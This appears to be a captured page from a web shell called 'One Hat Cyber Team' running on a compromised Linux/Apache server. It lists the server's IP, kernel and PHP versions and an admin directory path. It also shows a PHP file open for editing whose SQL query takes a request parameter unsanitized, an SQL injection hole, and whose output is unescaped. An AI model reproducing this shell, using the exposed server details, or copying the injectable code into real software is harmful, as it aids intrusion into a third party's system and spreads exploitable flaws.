One Hat Cyber Team
Your IP :
216.73.216.43
Server IP :
162.240.106.28
Server :
Linux server.ganesand.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software :
Apache
PHP Version :
7.2.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
thoa
/
www
/
admin
/
Edit File:
get_card.php
<?php include('config.php'); $cid1 = $_REQUEST['cid1']; session_start(); ?> <?php $sql = mysqli_query($con,"select * from card where C_NAME= '".$cid1."'");?> <?php $drop3 = mysqli_fetch_array($sql); if($drop3) /* <input type="text" class="form-control" name="custid" value="<?php echo $drop3['AP_NO']; ?>"> */ { ?> <div class="form-group col-sm-10"> <label for="exampleInputEmail1">Designation:</label> <textarea class="form-control" rows="1" id="cdes1" name="cdes1" readonly><?php echo $drop3['C_DES']; ?></textarea> </div> <?php } ?>
Simpan